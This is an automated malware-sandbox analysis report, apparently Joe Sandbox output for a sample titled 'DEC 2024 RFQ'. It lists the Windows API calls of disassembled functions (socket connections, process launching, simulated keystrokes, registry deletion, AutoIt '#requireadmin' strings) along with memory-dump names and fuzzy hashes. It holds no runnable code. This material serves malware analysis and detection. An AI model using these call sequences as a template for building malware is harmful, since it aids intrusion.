• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d0a179707bdfb85882ac5e13ad349e4dc3074447d3d9799d1a8fd0e413cb4aaf
• Instruction ID: 8a83c256d5425ec5689f3911825a36fb8fa62eaa54bbae43779e6ec4cee7cd4c
• Opcode Fuzzy Hash: d0a179707bdfb85882ac5e13ad349e4dc3074447d3d9799d1a8fd0e413cb4aaf
• Instruction Fuzzy Hash: F261DF72608310ABDB10EB24DC81EAFB7E8AF84714F40491DF5959B2A3DB31ED44CB92
APIs
• IsWindow.USER32(016F5690), ref: 000AB3EB
• IsWindowEnabled.USER32(016F5690), ref: 000AB3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 000AB4DB
• SendMessageW.USER32(016F5690,000000B0,?,?), ref: 000AB512
• IsDlgButtonChecked.USER32(?,?), ref: 000AB54F
• GetWindowLongW.USER32(016F5690,000000EC), ref: 000AB571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 000AB589
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 2c23262b0eaeeb2f14fce367e67e0b4e8ef2ffc32dc6af9a459dddeebcba396c
• Instruction ID: 96b1073f7656bb3deacbe4ccd96953a76de83e1645ff5eecefc8da72751da147
• Opcode Fuzzy Hash: 2c23262b0eaeeb2f14fce367e67e0b4e8ef2ffc32dc6af9a459dddeebcba396c
• Instruction Fuzzy Hash: 43718B34604604EFEB609FA5C894FFA7BF9EF0B300F144459EA85A72A3C736A950DB50
APIs
• _memset.LIBCMT ref: 0009F448
• _memset.LIBCMT ref: 0009F511
• ShellExecuteExW.SHELL32(?), ref: 0009F556
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
  • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
• GetProcessId.KERNEL32(00000000), ref: 0009F5CD
• CloseHandle.KERNEL32(00000000), ref: 0009F5FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: c4ac53a97bcf6e7c65e6732daf66bf9f8b20c77fe37b317adc216b7e9cd68819
• Instruction ID: 060f7f30c3f1f895d1a7c2cfe38b708899d59a3abdc1e7a88a93a6c1ef3213ff
• Opcode Fuzzy Hash: c4ac53a97bcf6e7c65e6732daf66bf9f8b20c77fe37b317adc216b7e9cd68819
• Instruction Fuzzy Hash: D261A075A0062ADFCF14DFA4D8859AEBBF5FF49310F148069E859AB352CB30AD41CB94
APIs
• GetParent.USER32(?), ref: 00080F8C
• GetKeyboardState.USER32(?), ref: 00080FA1
• SetKeyboardState.USER32(?), ref: 00081002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00081030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0008104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00081095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 000810B8
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: fbb03ba71472f444ce31a486ff4325635c2b2385d2774868967fc2c75035740d
• Instruction ID: 6275c13fe0f5027f664fc4bd8fdcd03f0e0efdcbe49c7fe5febb2e9e2f08b6e8
• Opcode Fuzzy Hash: fbb03ba71472f444ce31a486ff4325635c2b2385d2774868967fc2c75035740d
• Instruction Fuzzy Hash: 5D51C3705046D539FB7662348C05BFABEE97F06304F088589E2D8858D3C2D9ACDADB51
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(00000000), ref: 00080DA5
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00080DBA
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00080E1B
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00080E47
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00080E64
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00080EA8
                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00080EC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 273162ca3bb3da2b8212c5dc1a72b12f02673b132e386e0d01fcc2e11811d75d
                                                                                                                      • Instruction ID: e32986d5effad549a0aa5fd68798417991e0986487ba3059d82d69205ea05051
                                                                                                                      • Opcode Fuzzy Hash: 273162ca3bb3da2b8212c5dc1a72b12f02673b132e386e0d01fcc2e11811d75d
                                                                                                                      • Instruction Fuzzy Hash: F351E4A06047D63DFBB2A7748C45BBA7EE97F06300F088889E1D48A8C3C395AC9DD750
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2945705084-0
                                                                                                                      • Opcode ID: 82ec2e9cf89d8761e52bf60771b4b209817d484614148cb905c9999a0dd331d4
                                                                                                                      • Instruction ID: cf6c48629a6cbd323b23044a2fd4ffc3efaee1df379017cd714ee2169b82f4c1
                                                                                                                      • Opcode Fuzzy Hash: 82ec2e9cf89d8761e52bf60771b4b209817d484614148cb905c9999a0dd331d4
                                                                                                                      • Instruction Fuzzy Hash: 844160A5C1061476CB11FBB48C46ACFB3A8EF05310F509966F558E3222EB34A755C7EA
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00083697,?), ref: 0008468B
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00083697,?), ref: 000846A4
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000836B7
                                                                                                                      • _wcscmp.LIBCMT ref: 000836D3
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000836EB
                                                                                                                      • _wcscat.LIBCMT ref: 00083733
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 0008379F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                      • Opcode ID: 1917bd41478c06093c28c7f354001f88b4c444e1edcd669750cc24c51eac2900
                                                                                                                      • Instruction ID: 487ebcf66d4f4b3e51a01f82cf3bde860b4b40c9d96628ed8d3d3526253fcb1c
                                                                                                                      • Opcode Fuzzy Hash: 1917bd41478c06093c28c7f354001f88b4c444e1edcd669750cc24c51eac2900
                                                                                                                      • Instruction Fuzzy Hash: A141AEB1508345AAC762FF64D441ADFB7E8BF89780F00082EB4CAC7252EA34D689C756
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000A72AA
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000A7351
                                                                                                                      • IsMenu.USER32(?), ref: 000A7369
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000A73B1
                                                                                                                      • DrawMenuBar.USER32 ref: 000A73C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      • Opcode ID: a61480c3217a500df1cd81276eb0ef4cd4a4cc703ffdf38c2af5ab97aaf00a20
                                                                                                                      • Instruction ID: 9bff109897e564592c63a288f73c9f4a5fd4f8c55b65d6fa97a8cbc20b54476f
                                                                                                                      • Opcode Fuzzy Hash: a61480c3217a500df1cd81276eb0ef4cd4a4cc703ffdf38c2af5ab97aaf00a20
                                                                                                                      • Instruction Fuzzy Hash: 6C412876A04609EFDF20DF90D884AAABBF8FF06314F158429FD49AB250D730AE54DB50
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 000A0FD4
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000A0FFE
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000A10B5
                                                                                                                        • Part of subcall function 000A0FA5: RegCloseKey.ADVAPI32(?), ref: 000A101B
                                                                                                                        • Part of subcall function 000A0FA5: FreeLibrary.KERNEL32(?), ref: 000A106D
                                                                                                                        • Part of subcall function 000A0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 000A1090
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 000A1058
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 395352322-0
                                                                                                                      • Opcode ID: 1033e5780dbabd63760893ded9d59177842fd1f0712914bc23aa730592567caa
                                                                                                                      • Instruction ID: 1fbe1f01a8adf3d62456e8cc92c334127a0d56d7ffceeef20686218e5d5b80cb
                                                                                                                      • Opcode Fuzzy Hash: 1033e5780dbabd63760893ded9d59177842fd1f0712914bc23aa730592567caa
                                                                                                                      • Instruction Fuzzy Hash: A0310DB1901109BFEB159FD0DC89EFFB7BCEF09350F000169E511E2151EA749E859AA4
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000A62EC
                                                                                                                      • GetWindowLongW.USER32(016F5690,000000F0), ref: 000A631F
                                                                                                                      • GetWindowLongW.USER32(016F5690,000000F0), ref: 000A6354
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000A6386
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000A63B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000A63C1
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000A63DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178440468-0
                                                                                                                      • Opcode ID: 0a124366ab977ea840bc0979843755348bf043956fdb2406ff732235d62bb505
                                                                                                                      • Instruction ID: 4ed6a85b02ec01da4d0038bba5d80007e6b9d3542e6dbe289e94130845d6c6f9
                                                                                                                      • Opcode Fuzzy Hash: 0a124366ab977ea840bc0979843755348bf043956fdb2406ff732235d62bb505
                                                                                                                      • Instruction Fuzzy Hash: 09313436640541EFEB20CF98DC84F6937F1FB4A714F1901A4F511AF2B2CB76A9419B50
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DB2E
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DB54
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0007DB57
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0007DB75
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0007DB7E
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0007DBA3
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0007DBB1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: 3bb211673ef11915f66767d2fdf90962c12acaf8e9edaf8a4e3d46fa4f68cb02
• Instruction ID: f4de0782a57959cc18591ef26c98be937dabebe4da75d8f15a937a430a1522ba
• Opcode Fuzzy Hash: 3bb211673ef11915f66767d2fdf90962c12acaf8e9edaf8a4e3d46fa4f68cb02
• Instruction Fuzzy Hash: 45217176A00219AFEB10AFB9DC84CBB73ECEF09360B018566F918DB251D7789C418768
APIs
  • Part of subcall function 00097D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00097DB6
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000961C6
• WSAGetLastError.WSOCK32(00000000), ref: 000961D5
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0009620E
• connect.WSOCK32(00000000,?,00000010), ref: 00096217
• WSAGetLastError.WSOCK32 ref: 00096221
• closesocket.WSOCK32(00000000), ref: 0009624A
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00096263
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 83124746765d85591719afc3f079e3bfd05610e23d2e2b2ae350e38eb9ad0951
• Instruction ID: ed753c059357eede07dd81e51917cdf9008b791da33fc37ea180ba95520a00a5
• Opcode Fuzzy Hash: 83124746765d85591719afc3f079e3bfd05610e23d2e2b2ae350e38eb9ad0951
• Instruction Fuzzy Hash: 9731B331600518AFEF10AF64DC85BBE77ACEF45750F044069FD05A7292DB75AC049BA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: f56f8afe9bfb379017c5850cf394ef8cb537599d196116afc0f06b70433c8253
• Instruction ID: 563310585fbc2dbb7bfdb56927253f49c59926ae10359eaf5ff92d23293b2be0
• Opcode Fuzzy Hash: f56f8afe9bfb379017c5850cf394ef8cb537599d196116afc0f06b70433c8253
• Instruction Fuzzy Hash: BE216BB2A0851366D234B634AC02EFB73D8EF55340F10C039F98A8B092EB699D41D39D
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DC09
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DC2F
• SysAllocString.OLEAUT32(00000000), ref: 0007DC32
• SysAllocString.OLEAUT32 ref: 0007DC53
• SysFreeString.OLEAUT32 ref: 0007DC5C
• StringFromGUID2.OLE32(?,?,00000028), ref: 0007DC76
• SysAllocString.OLEAUT32(?), ref: 0007DC84
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 959dabb19ccafbf4c098977b5b012a360e6c0674d0c5aaa21363b5eeee984d9d
• Instruction ID: 48cee972806f692647e29eeaf587236843bc1ac5531a9327df1732a346e291c3
• Opcode Fuzzy Hash: 959dabb19ccafbf4c098977b5b012a360e6c0674d0c5aaa21363b5eeee984d9d
• Instruction Fuzzy Hash: 32213375604205AFEB10ABE8DC88DBA77ECEF09360B10C126F918CB261D678DC41D768
APIs
  • Part of subcall function 00021D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00021D73
  • Part of subcall function 00021D35: GetStockObject.GDI32(00000011), ref: 00021D87
  • Part of subcall function 00021D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00021D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000A7632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000A763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000A764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000A7659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000A7665
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 9c7cc23c757cf7fba90e763a27f251471cab5e423e869d266611a78e37c4263b
• Instruction ID: cc422d2bccd1c95d6fae7faa7a815965acb784d9da992680927fe331181c5329
• Opcode Fuzzy Hash: 9c7cc23c757cf7fba90e763a27f251471cab5e423e869d266611a78e37c4263b
• Instruction Fuzzy Hash: 4211C8B1110219BFEF158FA4CC85EE77F5DEF09798F014115B708A6051C7729C21DBA4
APIs
• __init_pointers.LIBCMT ref: 00049AE6
  • Part of subcall function 00043187: EncodePointer.KERNEL32(00000000), ref: 0004318A
  • Part of subcall function 00043187: __initp_misc_winsig.LIBCMT ref: 000431A5
  • Part of subcall function 00043187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00049EA0
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00049EB4
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00049EC7
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00049EDA
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00049EED
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00049F00
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00049F13
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00049F26
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00049F39
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00049F4C
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00049F5F
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00049F72
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00049F85
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00049F98
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00049FAB
  • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00049FBE
• __mtinitlocks.LIBCMT ref: 00049AEB
• __mtterm.LIBCMT ref: 00049AF4
  • Part of subcall function 00049B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00049AF9,00047CD0,000DA0B8,00000014), ref: 00049C56
  • Part of subcall function 00049B5C: _free.LIBCMT ref: 00049C5D
